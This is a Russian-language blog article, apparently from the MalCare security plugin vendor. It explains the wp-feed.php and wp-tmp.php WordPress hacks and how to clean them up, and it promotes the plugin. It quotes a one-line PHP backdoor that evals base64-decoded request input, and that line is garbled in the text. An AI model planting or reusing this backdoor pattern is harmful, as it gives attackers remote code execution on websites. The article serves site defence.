Вредоносные программы в WordPress


Как исправить вредоносные программы Wp-Feed.php и Wp-Tmp.php в WordPress

Ваши посетители жалуются на спам-рекламу на вашем сайте WordPress, но вы ничего не видите? Ваш сканер вредоносных программ предупреждает вас о том, что «ваш сайт взломан», но он выглядит хорошо для вас? Знаете ли вы, что хакер может скрыть взлом от вас? Хакеры находят хитрые способы скрыть свои взломы от владельцев сайтов, чтобы они долгое время оставались незамеченными. Два распространенных и хорошо замаскированных хака - это хаки wp-feed.php и хак wp-tmp.php.

При подобных взломах ваш сайт отображает рекламу ваших нелегальных продуктов, наркотиков и контента для взрослых для ваших посетителей.

Поскольку хак скрыт от вас, он будет оставаться активным на вашем сайте в течение длительного времени, прежде чем вы обнаружите его. Вероятность того, что Google обнаружит это раньше, высока. Если они обнаружат вредоносное ПО, они немедленно внесут в черный список ваш сайт, чтобы защитить своих пользователей. Затем ваш веб-хостинг будет быстро приостановить вашу учетную запись, чтобы защитить свои собственные интересы.

Эти последствия будут иметь серьезные последствия для вашего сайта и вашего бизнеса. К счастью, есть способы исправить эти типы хаков и вернуть ваш сайт в нормальное состояние.

В этом руководстве мы объясним, что такое взломы wp-feed и wp-tmp, и покажем, как их исправить и предотвратить.TL; DR - наш плагин безопасности MalCare предназначен для выявления и удаления взломанных файлов wp-feed и wp-tmp, даже если они замаскированы или скрыты. После установки плагина MalCare будет сканировать и находить файлы. Плагин также поможет вам очистить ваш сайт в течение нескольких минут и вернуться к делу.

Что такое Wp-tmp.php?

Когда ваш сайт WordPress получает значительный объем трафика, показ рекламы на вашем сайте может принести хороший доход. Но этот фактор также делает его уязвимым для взлома wp-feed.
В этом хакере wp-feed.php атака захватит ваши объявления и опубликует контент по своему выбору. Обычно это означает, что ваши посетители увидят непристойную рекламу контента для взрослых или запрещенных наркотиков. Хакер также может изменить изображение функции в текущем сообщении, которое просматривает посетитель. Однако, когда вы посещаете ваш сайт, он выглядит нормально

Как это скрыто от вас, но не от посетителей? Именно здесь появляется файл wp-feed.php. Файл записывает IP-адрес каждого пользователя веб-сайта. Когда посетитель заходит на сайт, он проверяет его IP на соответствие своей записи. Если посетитель является пользователем, то файл показывает ему / ей обычный чистый контент. Если это не пользователь, файл определяет его как пользовательский канал и отображает пользовательский контент.

Хакеры создают файл wp-tmp.php для установки бэкдора на ваш сайт. Используя этот файл WordPress, хакеры могут получить доступ к вашему веб-сайту и внедрить вредоносное ПО в любое время. Если вы очистите свой веб-сайт от вредоносных программ и не удалите файл wp-tmp.php, вы можете быть уверены, что ваш сайт скоро будет взломан. Файл WordPress wp-tmp может выглядеть следующим образом:

?php$p = $REQUEST$#91;”m”]; eval(base64_decode ($p));?
Если вы подозреваете, что вас взломали, вы можете отсканировать свой сайт, чтобы подтвердить свои сомнения.

Как сканировать ваш сайт WordPress на наличие файлов Wp-feed и Wp-tmp

Вы можете сканировать ваш сайт WordPress на предмет взломанных файлов двумя способами - вручную или с помощью плагина. Мы объясним оба.

Очистка вашего взломанного сайта WordPress вручную

Чтобы сканировать ваш сайт вручную, вам нужен доступ к файлам WordPress . Доступ к вашей учетной записи хостинга WordPress. Затем войдите в cPanel> Диспетчер файлов.

Здесь перейдите к public_html. Вы можете искать файлы wp-feed.php и wp-tmp.php, используя опцию поиска. Найдя эти файлы, вы можете просто удалить их.

Мы НЕ РЕКОМЕНДУЕМ этот метод, потому что во многих случаях он доказал свою неэффективность. Каждый раз, когда код в этих файлах WordPress выполняется, он создает новый вредоносный код в других файлах. Это сложный хак и может заразить несколько файлов. Далее, хакеры кодируют таким образом, что каждый раз, когда кто-то посещает ваш сайт, файл может появляться снова. Если вы хотите попытаться исправить ваш сайт, вам нужно убедиться, что никто не заходит на ваш сайт, пока вы его чистите.

Хакеры также усложняют очистку вручную, изменяя расположение этих файлов WordPress. Этот метод может разочаровать, потому что после многократной очистки вы обнаружите, что ваш сайт все еще взломан.

Чтобы избавиться от таких сложных взломов, лучше всего использовать службы безопасности веб-сайтов, такие как MalCare. Давайте посмотрим, как это работает.

Автоматическая очистка вашего взломанного сайта с помощью MalCare

Как мы уже говорили ранее, атака wp-feed сложна. Причины, по которым мы рекомендуем использовать MalCare :

MalCare - это плагин безопасности, разработанный для изучения более 240 000 сайтов WordPress. Он построен на технологии, которая гарантированно работает и может очистить ваш сайт мгновенно.
Многие доступные плагины обычно проверяют наличие часто обнаруживаемых вредоносных программ и пропускают любые новые виды вредоносных программ. MalCare анализирует поведение кода. При этом он также может находить новые, скрытые и замаскированные вредоносные программы.
Многие плагины дают вам сканирование поверхности. Но для атаки wp-feed вам понадобится плагин, который будет выполнять глубокое сканирование всего вашего сайта . MalCare делает именно это. Он просматривает все файлы, папки и базу данных вашего сайта.
Он также определяет бэкдоры, такие как файл wp-tmp.php, и помогает вам избавиться от них.

Примечание. Хакеры могут использовать одну и ту же кодировку wp-feed и wp-tmp и переименовать файл как-нибудь еще. Это затрудняет поиск вручную, но не с помощью MalCare. Плагин найдет вредоносную программу независимо от имени файла.